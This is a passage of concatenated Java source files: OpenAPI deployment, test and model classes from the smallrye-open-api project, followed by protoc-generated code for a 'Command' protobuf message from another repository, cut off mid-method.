if (archive instanceof WebArchive) {
WebArchive war = (WebArchive) archive;
war.addClass(OpenApiRegistration.class);
war.addClass(OpenApiApplication.class);
war.addClass(OpenApiEndpoint.class);
war.addAsWebInfResource(EmptyAsset.INSTANCE, ArchivePaths.create("beans.xml"));
// This sets the war name as the context root
war.addAsWebInfResource(
new StringAsset("<Configure class=\"org.eclipse.jetty.webapp.WebAppContext\">\n" +
" <Set name=\"contextPath\">/" + war.getName() + "</Set>\n" +
" ...\n" +
"</Configure>"),
ArchivePaths.create("jetty-web.xml"));
// Add the required dependencies
String[] deps = {
"org.jboss.resteasy:resteasy-servlet-initializer",
"org.jboss.resteasy:resteasy-cdi",
"org.jboss.resteasy:resteasy-json-binding-provider",
"io.smallrye:smallrye-open-api-core",
"io.smallrye:smallrye-open-api-jaxrs"
};
File[] dependencies = Maven.configureResolver()
.workOffline()
.loadPomFromFile(new File("pom.xml"))
.resolve(deps)
.withoutTransitivity()
.asFile();
war.addAsLibraries(dependencies);
generateOpenAPI(war);
LOGGER.log(Level.FINE, () -> war.toString(true));
}
}
/**
* Builds the OpenAPI file and copies it to the deployed application.
*/
private static void generateOpenAPI(final WebArchive war) {
OpenApiConfig openApiConfig = config(war);
Index index = index(war, openApiConfig);
ClassLoader contextClassLoader = currentThread().getContextClassLoader();
Optional<OpenAPI> annotationModel = ofNullable(modelFromAnnotations(openApiConfig, contextClassLoader, index));
Optional<OpenAPI> readerModel = ofNullable(modelFromReader(openApiConfig, contextClassLoader));
Optional<OpenAPI> staticFileModel = Stream.of(modelFromFile(war, "/META-INF/openapi.json", JSON),
modelFromFile(war, "/META-INF/openapi.yaml", YAML),
modelFromFile(war, "/META-INF/openapi.yml", YAML))
.filter(Optional::isPresent)
.findFirst()
.flatMap(openAPI -> openAPI);
OpenApiDocument document = OpenApiDocument.INSTANCE;
document.reset();
document.config(openApiConfig);
annotationModel.ifPresent(document::modelFromAnnotations);
readerModel.ifPresent(document::modelFromReader);
staticFileModel.ifPresent(document::modelFromStaticFile);
document.filter(getFilter(openApiConfig, contextClassLoader));
document.initialize();
OpenAPI openAPI = document.get();
try {
war.addAsManifestResource(new ByteArrayAsset(serialize(openAPI, JSON).getBytes(UTF_8)), "openapi.json");
war.addAsManifestResource(new ByteArrayAsset(serialize(openAPI, YAML).getBytes(UTF_8)), "openapi.yaml");
} catch (IOException e) {
// Ignore
}
document.reset();
}
/**
* Provides the Jandex index.
*/
private static Index index(final WebArchive war, final OpenApiConfig config) {
FilteredIndexView filteredIndexView = new FilteredIndexView(null, config);
Indexer indexer = new Indexer();
Collection<Node> classes = war.getContent(object -> object.get().endsWith(".class")).values();
for (Node value : classes) {
try {
String resource = value.getPath().get().replaceAll("/WEB-INF/classes/", "");
// We remove the OpenApiEndpoint so the /openapi endpoint is not generated
if (resource.contains(OpenApiEndpoint.class.getSimpleName())) {
continue;
}
DotName dotName = DotName.createSimple(resource.replaceAll("/", ".").substring(0, resource.length() - 6));
if (filteredIndexView.accepts(dotName)) {
indexer.index(DeploymentProcessor.class.getClassLoader().getResourceAsStream(resource));
}
} catch (IOException e) {
// Ignore
}
}
return indexer.complete();
}
/**
* Creates the config from the microprofile-config.properties file in the application. The spec defines that the
* config file may be present in two locations.
*/
private static OpenApiConfig config(final WebArchive war) {
Optional<Node> microprofileConfig = Stream.of(ofNullable(war.get("/META-INF/microprofile-config.properties")),
ofNullable(war.get("/WEB-INF/classes/META-INF/microprofile-config.properties")))
.filter(Optional::isPresent)
.findFirst()
.flatMap(node -> node);
if (!microprofileConfig.isPresent()) {
return new OpenApiConfigImpl(ConfigProvider.getConfig());
}
Properties properties = new Properties();
try (InputStreamReader reader = new InputStreamReader(microprofileConfig.get().getAsset().openStream(), UTF_8)) {
properties.load(reader);
} catch (IOException e) {
e.printStackTrace();
}
SmallRyeConfig config = new SmallRyeConfigBuilder()
.addDefaultSources()
.addDefaultInterceptors()
.withSources(new PropertiesConfigSource(properties, "microprofile-config.properties"))
.build();
return new OpenApiConfigImpl(config);
}
private static Optional<OpenAPI> modelFromFile(final WebArchive war, final String location,
final Format format) {
return ofNullable(war.get(location))
.map(Node::getAsset)
.map(asset -> new OpenApiStaticFile(asset.openStream(), format))
.map(OpenApiProcessor::modelFromStaticFile);
}
}
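// Illustrative sketch (added, not part of the original source): a minimal
// microprofile-config.properties that the config(...) method above would pick up from either
// supported location. The property names are the standard MicroProfile OpenAPI keys; the values
// are hypothetical.
//
//   mp.openapi.scan.disable=false
//   mp.openapi.scan.exclude.classes=io.smallrye.openapi.tck.OpenApiEndpoint
//   mp.openapi.servers=http://localhost:8080
//
// The FilteredIndexView built in index(...) honours the scan include/exclude keys when deciding
// which classes are fed into the Jandex indexer.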
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/BaseGenericResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import java.util.Map;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.QueryParam;
public class BaseGenericResource<T1, T2, T3> {
public static class GenericBean<G> {
@QueryParam(value = "g1")
G g1;
}
@GET
@Path(value = "typevar")
public T1 test(@QueryParam(value = "q1") T2 q1) {
return null;
}
@GET
@Path(value = "map")
public Map<T2, T3> getMap(T1 filter) {
return null;
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/OneSidedParent.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
public class OneSidedParent {
@Schema(hidden = true)
public String getParentProp1() {
return "";
}
@Schema(hidden = true)
public void setParentProp2(String something) {
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/api/models/PathItemImpl.java<|end_filename|>
package io.smallrye.openapi.api.models;
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import org.eclipse.microprofile.openapi.models.Operation;
import org.eclipse.microprofile.openapi.models.PathItem;
import org.eclipse.microprofile.openapi.models.parameters.Parameter;
import org.eclipse.microprofile.openapi.models.servers.Server;
import io.smallrye.openapi.runtime.util.ModelUtil;
/**
* An implementation of the {@link PathItem} OpenAPI model interface.
*/
public class PathItemImpl extends ExtensibleImpl<PathItem> implements PathItem, ModelImpl {
private String ref;
private String summary;
private String description;
private Operation get;
private Operation put;
private Operation post;
private Operation delete;
private Operation options;
private Operation head;
private Operation patch;
private Operation trace;
private List<Parameter> parameters;
private List<Server> servers;
/**
* @see org.eclipse.microprofile.openapi.models.Reference#getRef()
*/
@Override
public String getRef() {
return ref;
}
/**
* @see org.eclipse.microprofile.openapi.models.Reference#setRef(java.lang.String)
*/
@Override
public void setRef(String ref) {
this.ref = ref;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getSummary()
*/
@Override
public String getSummary() {
return this.summary;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setSummary(java.lang.String)
*/
@Override
public void setSummary(String summary) {
this.summary = summary;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#summary(java.lang.String)
*/
@Override
public PathItem summary(String summary) {
this.summary = summary;
return this;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getDescription()
*/
@Override
public String getDescription() {
return this.description;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setDescription(java.lang.String)
*/
@Override
public void setDescription(String description) {
this.description = description;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getGET()
*/
@Override
public Operation getGET() {
return this.get;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setGET(org.eclipse.microprofile.openapi.models.Operation)
*/
@Override
public void setGET(Operation get) {
this.get = get;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getPUT()
*/
@Override
public Operation getPUT() {
return this.put;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setPUT(org.eclipse.microprofile.openapi.models.Operation)
*/
@Override
public void setPUT(Operation put) {
this.put = put;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getPOST()
*/
@Override
public Operation getPOST() {
return this.post;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setPOST(org.eclipse.microprofile.openapi.models.Operation)
*/
@Override
public void setPOST(Operation post) {
this.post = post;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getDELETE()
*/
@Override
public Operation getDELETE() {
return this.delete;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setDELETE(org.eclipse.microprofile.openapi.models.Operation)
*/
@Override
public void setDELETE(Operation delete) {
this.delete = delete;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getOPTIONS()
*/
@Override
public Operation getOPTIONS() {
return this.options;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setOPTIONS(org.eclipse.microprofile.openapi.models.Operation)
*/
@Override
public void setOPTIONS(Operation options) {
this.options = options;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getHEAD()
*/
@Override
public Operation getHEAD() {
return this.head;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setHEAD(org.eclipse.microprofile.openapi.models.Operation)
*/
@Override
public void setHEAD(Operation head) {
this.head = head;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getPATCH()
*/
@Override
public Operation getPATCH() {
return this.patch;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setPATCH(org.eclipse.microprofile.openapi.models.Operation)
*/
@Override
public void setPATCH(Operation patch) {
this.patch = patch;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getTRACE()
*/
@Override
public Operation getTRACE() {
return this.trace;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setTRACE(org.eclipse.microprofile.openapi.models.Operation)
*/
@Override
public void setTRACE(Operation trace) {
this.trace = trace;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getOperations()
*/
@Override
public Map<HttpMethod, Operation> getOperations() {
Map<HttpMethod, Operation> ops = new LinkedHashMap<>();
addOperationToMap(HttpMethod.GET, this.get, ops);
addOperationToMap(HttpMethod.PUT, this.put, ops);
addOperationToMap(HttpMethod.POST, this.post, ops);
addOperationToMap(HttpMethod.DELETE, this.delete, ops);
addOperationToMap(HttpMethod.OPTIONS, this.options, ops);
addOperationToMap(HttpMethod.HEAD, this.head, ops);
addOperationToMap(HttpMethod.PATCH, this.patch, ops);
addOperationToMap(HttpMethod.TRACE, this.trace, ops);
return ops;
}
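// Note (grounded in the method above): getOperations() returns a freshly built LinkedHashMap
// containing only the non-null operations, in fixed GET..TRACE order; it is not a live view of
// this PathItem, so later setOperation() calls are not reflected in a previously returned map.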
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setOperation(PathItem.HttpMethod, Operation)
*/
@Override
public void setOperation(PathItem.HttpMethod httpMethod, Operation operation) {
switch (httpMethod) {
case GET:
this.get = operation;
break;
case POST:
this.post = operation;
break;
case PUT:
this.put = operation;
break;
case DELETE:
this.delete = operation;
break;
case PATCH:
this.patch = operation;
break;
case OPTIONS:
this.options = operation;
break;
case HEAD:
this.head = operation;
break;
case TRACE:
this.trace = operation;
break;
} // SWITCH
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getServers()
*/
@Override
public List<Server> getServers() {
return ModelUtil.unmodifiableList(this.servers);
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setServers(java.util.List)
*/
@Override
public void setServers(List<Server> servers) {
this.servers = ModelUtil.replace(servers, ArrayList<Server>::new);
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#addServer(org.eclipse.microprofile.openapi.models.servers.Server)
*/
@Override
public PathItem addServer(Server server) {
this.servers = ModelUtil.add(server, this.servers, ArrayList<Server>::new);
return this;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#removeServer(org.eclipse.microprofile.openapi.models.servers.Server)
*/
@Override
public void removeServer(Server server) {
ModelUtil.remove(this.servers, server);
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getParameters()
*/
@Override
public List<Parameter> getParameters() {
return ModelUtil.unmodifiableList(this.parameters);
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setParameters(java.util.List)
*/
@Override
public void setParameters(List<Parameter> parameters) {
this.parameters = ModelUtil.replace(parameters, ArrayList<Parameter>::new);
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#addParameter(org.eclipse.microprofile.openapi.models.parameters.Parameter)
*/
@Override
public PathItem addParameter(Parameter parameter) {
this.parameters = ModelUtil.add(parameter, this.parameters, ArrayList<Parameter>::new);
return this;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#removeParameter(org.eclipse.microprofile.openapi.models.parameters.Parameter)
*/
@Override
public void removeParameter(Parameter parameter) {
ModelUtil.remove(this.parameters, parameter);
}
/**
 * Adds the given operation to the given map only if the operation is not null.
 *
 * @param method the HTTP method to use as the map key
 * @param operation the operation to add; ignored when {@code null}
 * @param operationMap the map the operation is added to
 */
private void addOperationToMap(HttpMethod method, Operation operation, Map<HttpMethod, Operation> operationMap) {
if (operation != null) {
operationMap.put(method, operation);
}
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/BeanParamImpl.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.CookieParam;
public class BeanParamImpl extends BeanParamBase implements BeanParamAddon {
@CookieParam(value = "cc1")
String cc1;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ParametersInConstructorTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.validation.constraints.NotNull;
import javax.ws.rs.BeanParam;
import javax.ws.rs.CookieParam;
import javax.ws.rs.DELETE;
import javax.ws.rs.DefaultValue;
import javax.ws.rs.HeaderParam;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.QueryParam;
import org.eclipse.microprofile.openapi.annotations.enums.ParameterIn;
import org.eclipse.microprofile.openapi.annotations.parameters.Parameter;
@Path(value = "/parameters-in-constructor/{id}/{p1}")
@SuppressWarnings(value = "unused")
public class ParametersInConstructorTestResource {
public static class Bean {
@PathParam(value = "id")
@DefaultValue(value = "BEAN")
String id;
}
private Bean param;
public ParametersInConstructorTestResource(
@Parameter(name = "h1", in = ParameterIn.HEADER, description = "Description of h1") @HeaderParam(value = "h1") @Deprecated String h1,
@Parameter(name = "h2", in = ParameterIn.HEADER, hidden = true) @HeaderParam(value = "h2") String h2,
@Parameter(name = "q1", deprecated = true) @QueryParam(value = "q1") String q1,
@NotNull @CookieParam(value = "c1") String c1, @PathParam(value = "p1") String p1, @BeanParam Bean b1) {
}
@DELETE
public void deleteWidget() {
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/jakarta/XmlAccessTypePublicMember.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta;
import jakarta.xml.bind.annotation.XmlAccessType;
import jakarta.xml.bind.annotation.XmlAccessorType;
@XmlAccessorType(value = XmlAccessType.PUBLIC_MEMBER)
public class XmlAccessTypePublicMember {
public String prop1Field;
@SuppressWarnings(value = "unused")
private String prop2Field;
public String getProp3Property() {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/MultipartFormUploadIconForm.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.FormParam;
public class MultipartFormUploadIconForm extends MultipartFormVerify {
@FormParam(value = "icon")
public byte[] icon;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ParameterRefTestApplication.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.core.Application;
import org.eclipse.microprofile.openapi.annotations.Components;
import org.eclipse.microprofile.openapi.annotations.OpenAPIDefinition;
import org.eclipse.microprofile.openapi.annotations.enums.ParameterIn;
import org.eclipse.microprofile.openapi.annotations.info.Info;
import org.eclipse.microprofile.openapi.annotations.parameters.Parameter;
@OpenAPIDefinition(info = @Info(title = "title", version = "1"), components = @Components(parameters = {
@Parameter(name = "queryParam1", in = ParameterIn.QUERY),
@Parameter(name = "pathParam2", in = ParameterIn.PATH, description = "`pathParam2` with info in components") }))
public class ParameterRefTestApplication extends Application {
}
| gasper-vrhovsek/smallrye-open-api |
<|start_filename|>java/src/com/zlalanne/Message.java<|end_filename|>
// Generated by the protocol buffer compiler. DO NOT EDIT!
// source: message.proto
package com.zlalanne;
public final class Message {
private Message() {}
public static void registerAllExtensions(
com.google.protobuf.ExtensionRegistry registry) {
}
public interface CommandOrBuilder extends
// @@protoc_insertion_point(interface_extends:Command)
com.google.protobuf.MessageOrBuilder {
/**
* <code>required .Command.CommandType type = 1;</code>
*/
boolean hasType();
/**
* <code>required .Command.CommandType type = 1;</code>
*/
com.zlalanne.Message.Command.CommandType getType();
/**
* <code>required string name = 2;</code>
*/
boolean hasName();
/**
* <code>required string name = 2;</code>
*/
java.lang.String getName();
/**
* <code>required string name = 2;</code>
*/
com.google.protobuf.ByteString
getNameBytes();
/**
* <code>optional string data = 3;</code>
*/
boolean hasData();
/**
* <code>optional string data = 3;</code>
*/
java.lang.String getData();
/**
* <code>optional string data = 3;</code>
*/
com.google.protobuf.ByteString
getDataBytes();
}
/**
* Protobuf type {@code Command}
*/
public static final class Command extends
com.google.protobuf.GeneratedMessage implements
// @@protoc_insertion_point(message_implements:Command)
CommandOrBuilder {
// Use Command.newBuilder() to construct.
private Command(com.google.protobuf.GeneratedMessage.Builder<?> builder) {
super(builder);
this.unknownFields = builder.getUnknownFields();
}
private Command(boolean noInit) { this.unknownFields = com.google.protobuf.UnknownFieldSet.getDefaultInstance(); }
private static final Command defaultInstance;
public static Command getDefaultInstance() {
return defaultInstance;
}
public Command getDefaultInstanceForType() {
return defaultInstance;
}
private final com.google.protobuf.UnknownFieldSet unknownFields;
@java.lang.Override
public final com.google.protobuf.UnknownFieldSet
getUnknownFields() {
return this.unknownFields;
}
private Command(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
initFields();
int mutable_bitField0_ = 0;
com.google.protobuf.UnknownFieldSet.Builder unknownFields =
com.google.protobuf.UnknownFieldSet.newBuilder();
try {
boolean done = false;
while (!done) {
int tag = input.readTag();
switch (tag) {
case 0:
done = true;
break;
default: {
if (!parseUnknownField(input, unknownFields,
extensionRegistry, tag)) {
done = true;
}
break;
}
case 8: {
int rawValue = input.readEnum();
com.zlalanne.Message.Command.CommandType value = com.zlalanne.Message.Command.CommandType.valueOf(rawValue);
if (value == null) {
unknownFields.mergeVarintField(1, rawValue);
} else {
bitField0_ |= 0x00000001;
type_ = value;
}
break;
}
case 18: {
com.google.protobuf.ByteString bs = input.readBytes();
bitField0_ |= 0x00000002;
name_ = bs;
break;
}
case 26: {
com.google.protobuf.ByteString bs = input.readBytes();
bitField0_ |= 0x00000004;
data_ = bs;
break;
}
}
}
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
throw e.setUnfinishedMessage(this);
} catch (java.io.IOException e) {
throw new com.google.protobuf.InvalidProtocolBufferException(
e.getMessage()).setUnfinishedMessage(this);
} finally {
this.unknownFields = unknownFields.build();
makeExtensionsImmutable();
}
}
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return com.zlalanne.Message.internal_static_Command_descriptor;
}
protected com.google.protobuf.GeneratedMessage.FieldAccessorTable
internalGetFieldAccessorTable() {
return com.zlalanne.Message.internal_static_Command_fieldAccessorTable
.ensureFieldAccessorsInitialized(
com.zlalanne.Message.Command.class, com.zlalanne.Message.Command.Builder.class);
}
public static com.google.protobuf.Parser<Command> PARSER =
new com.google.protobuf.AbstractParser<Command>() {
public Command parsePartialFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return new Command(input, extensionRegistry);
}
};
@java.lang.Override
public com.google.protobuf.Parser<Command> getParserForType() {
return PARSER;
}
/**
* Protobuf enum {@code Command.CommandType}
*/
public enum CommandType
implements com.google.protobuf.ProtocolMessageEnum {
/**
* <code>START_TEST = 0;</code>
*/
START_TEST(0, 0),
/**
* <code>RESULTS = 1;</code>
*/
RESULTS(1, 1),
/**
* <code>SHUTDOWN = 2;</code>
*/
SHUTDOWN(2, 2),
;
/**
* <code>START_TEST = 0;</code>
*/
public static final int START_TEST_VALUE = 0;
/**
* <code>RESULTS = 1;</code>
*/
public static final int RESULTS_VALUE = 1;
/**
* <code>SHUTDOWN = 2;</code>
*/
public static final int SHUTDOWN_VALUE = 2;
public final int getNumber() { return value; }
public static CommandType valueOf(int value) {
switch (value) {
case 0: return START_TEST;
case 1: return RESULTS;
case 2: return SHUTDOWN;
default: return null;
}
}
public static com.google.protobuf.Internal.EnumLiteMap<CommandType>
internalGetValueMap() {
return internalValueMap;
}
private static com.google.protobuf.Internal.EnumLiteMap<CommandType>
internalValueMap =
new com.google.protobuf.Internal.EnumLiteMap<CommandType>() {
public CommandType findValueByNumber(int number) {
return CommandType.valueOf(number);
}
};
public final com.google.protobuf.Descriptors.EnumValueDescriptor
getValueDescriptor() {
return getDescriptor().getValues().get(index);
}
public final com.google.protobuf.Descriptors.EnumDescriptor
getDescriptorForType() {
return getDescriptor();
}
public static final com.google.protobuf.Descriptors.EnumDescriptor
getDescriptor() {
return com.zlalanne.Message.Command.getDescriptor().getEnumTypes().get(0);
}
private static final CommandType[] VALUES = values();
public static CommandType valueOf(
com.google.protobuf.Descriptors.EnumValueDescriptor desc) {
if (desc.getType() != getDescriptor()) {
throw new java.lang.IllegalArgumentException(
"EnumValueDescriptor is not for this type.");
}
return VALUES[desc.getIndex()];
}
private final int index;
private final int value;
private CommandType(int index, int value) {
this.index = index;
this.value = value;
}
// @@protoc_insertion_point(enum_scope:Command.CommandType)
}
private int bitField0_;
public static final int TYPE_FIELD_NUMBER = 1;
private com.zlalanne.Message.Command.CommandType type_;
/**
* <code>required .Command.CommandType type = 1;</code>
*/
public boolean hasType() {
return ((bitField0_ & 0x00000001) == 0x00000001);
}
/**
* <code>required .Command.CommandType type = 1;</code>
*/
public com.zlalanne.Message.Command.CommandType getType() {
return type_;
}
public static final int NAME_FIELD_NUMBER = 2;
private java.lang.Object name_;
/**
* <code>required string name = 2;</code>
*/
public boolean hasName() {
return ((bitField0_ & 0x00000002) == 0x00000002);
}
/**
* <code>required string name = 2;</code>
*/
public java.lang.String getName() {
java.lang.Object ref = name_;
if (ref instanceof java.lang.String) {
return (java.lang.String) ref;
} else {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
name_ = s;
}
return s;
}
}
/**
* <code>required string name = 2;</code>
*/
public com.google.protobuf.ByteString
getNameBytes() {
java.lang.Object ref = name_;
if (ref instanceof java.lang.String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
name_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
public static final int DATA_FIELD_NUMBER = 3;
private java.lang.Object data_;
/**
* <code>optional string data = 3;</code>
*/
public boolean hasData() {
return ((bitField0_ & 0x00000004) == 0x00000004);
}
/**
* <code>optional string data = 3;</code>
*/
public java.lang.String getData() {
java.lang.Object ref = data_;
if (ref instanceof java.lang.String) {
return (java.lang.String) ref;
} else {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
data_ = s;
}
return s;
}
}
/**
* <code>optional string data = 3;</code>
*/
public com.google.protobuf.ByteString
getDataBytes() {
java.lang.Object ref = data_;
if (ref instanceof java.lang.String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
data_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
private void initFields() {
type_ = com.zlalanne.Message.Command.CommandType.START_TEST;
name_ = "";
data_ = "";
}
private byte memoizedIsInitialized = -1;
public final boolean isInitialized() {
byte isInitialized = memoizedIsInitialized;
if (isInitialized == 1) return true;
if (isInitialized == 0) return false;
if (!hasType()) {
memoizedIsInitialized = 0;
return false;
}
if (!hasName()) {
memoizedIsInitialized = 0;
return false;
}
memoizedIsInitialized = 1;
return true;
}
public void writeTo(com.google.protobuf.CodedOutputStream output)
throws java.io.IOException {
getSerializedSize();
if (((bitField0_ & 0x00000001) == 0x00000001)) {
output.writeEnum(1, type_.getNumber());
}
if (((bitField0_ & 0x00000002) == 0x00000002)) {
output.writeBytes(2, getNameBytes());
}
if (((bitField0_ & 0x00000004) == 0x00000004)) {
output.writeBytes(3, getDataBytes());
}
getUnknownFields().writeTo(output);
}
private int memoizedSerializedSize = -1;
public int getSerializedSize() {
int size = memoizedSerializedSize;
if (size != -1) return size;
size = 0;
if (((bitField0_ & 0x00000001) == 0x00000001)) {
size += com.google.protobuf.CodedOutputStream
.computeEnumSize(1, type_.getNumber());
}
if (((bitField0_ & 0x00000002) == 0x00000002)) {
size += com.google.protobuf.CodedOutputStream
.computeBytesSize(2, getNameBytes());
}
if (((bitField0_ & 0x00000004) == 0x00000004)) {
size += com.google.protobuf.CodedOutputStream
.computeBytesSize(3, getDataBytes());
}
size += getUnknownFields().getSerializedSize();
memoizedSerializedSize = size;
return size;
}
private static final long serialVersionUID = 0L;
@java.lang.Override
protected java.lang.Object writeReplace()
throws java.io.ObjectStreamException {
return super.writeReplace();
}
public static com.zlalanne.Message.Command parseFrom(
com.google.protobuf.ByteString data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static com.zlalanne.Message.Command parseFrom(
com.google.protobuf.ByteString data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static com.zlalanne.Message.Command parseFrom(byte[] data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static com.zlalanne.Message.Command parseFrom(
byte[] data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static com.zlalanne.Message.Command parseFrom(java.io.InputStream input)
throws java.io.IOException {
return PARSER.parseFrom(input);
}
public static com.zlalanne.Message.Command parseFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return PARSER.parseFrom(input, extensionRegistry);
}
public static com.zlalanne.Message.Command parseDelimitedFrom(java.io.InputStream input)
throws java.io.IOException {
return PARSER.parseDelimitedFrom(input);
}
public static com.zlalanne.Message.Command parseDelimitedFrom(
java.io.InputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return PARSER.parseDelimitedFrom(input, extensionRegistry);
}
public static com.zlalanne.Message.Command parseFrom(
com.google.protobuf.CodedInputStream input)
throws java.io.IOException {
return PARSER.parseFrom(input);
}
public static com.zlalanne.Message.Command parseFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return PARSER.parseFrom(input, extensionRegistry);
}
public static Builder newBuilder() { return Builder.create(); }
public Builder newBuilderForType() { return newBuilder(); }
public static Builder newBuilder(com.zlalanne.Message.Command prototype) {
return newBuilder().mergeFrom(prototype);
}
public Builder toBuilder() { return newBuilder(this); }
@java.lang.Override
protected Builder newBuilderForType(
com.google.protobuf.GeneratedMessage.BuilderParent parent) {
Builder builder = new Builder(parent);
return builder;
}
/**
* Protobuf type {@code Command}
*/
public static final class Builder extends
com.google.protobuf.GeneratedMessage.Builder<Builder> implements
// @@protoc_insertion_point(builder_implements:Command)
com.zlalanne.Message.CommandOrBuilder {
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return com.zlalanne.Message.internal_static_Command_descriptor;
}
protected com.google.protobuf.GeneratedMessage.FieldAccessorTable
internalGetFieldAccessorTable() {
return com.zlalanne.Message.internal_static_Command_fieldAccessorTable
.ensureFieldAccessorsInitialized(
com.zlalanne.Message.Command.class, com.zlalanne.Message.Command.Builder.class);
}
// Construct using com.zlalanne.Message.Command.newBuilder()
private Builder() {
maybeForceBuilderInitialization();
}
private Builder(
com.google.protobuf.GeneratedMessage.BuilderParent parent) {
super(parent);
maybeForceBuilderInitialization();
}
private void maybeForceBuilderInitialization() {
if (com.google.protobuf.GeneratedMessage.alwaysUseFieldBuilders) {
}
}
private static Builder create() {
return new Builder();
}
public Builder clear() {
super.clear();
type_ = com.zlalanne.Message.Command.CommandType.START_TEST;
bitField0_ = (bitField0_ & ~0x00000001);
name_ = "";
bitField0_ = (bitField0_ & ~0x00000002);
data_ = "";
bitField0_ = (bitField0_ & ~0x00000004);
return this;
}
public Builder clone() {
return create().mergeFrom(buildPartial());
}
public com.google.protobuf.Descriptors.Descriptor
getDescriptorForType() {
return com.zlalanne.Message.internal_static_Command_descriptor;
}
public com.zlalanne.Message.Command getDefaultInstanceForType() {
return com.zlalanne.Message.Command.getDefaultInstance();
}
public com.zlalanne.Message.Command build() {
com.zlalanne.Message.Command result = buildPartial();
if (!result.isInitialized()) {
throw newUninitializedMessageException(result);
}
return result;
}
public com.zlalanne.Message.Command buildPartial() {
com.zlalanne.Message.Command result = new com.zlalanne.Message.Command(this);
int from_bitField0_ = bitField0_;
int to_bitField0_ = 0;
if (((from_bitField0_ & 0x00000001) == 0x00000001)) {
to_bitField0_ |= 0x00000001;
}
result.type_ = type_;
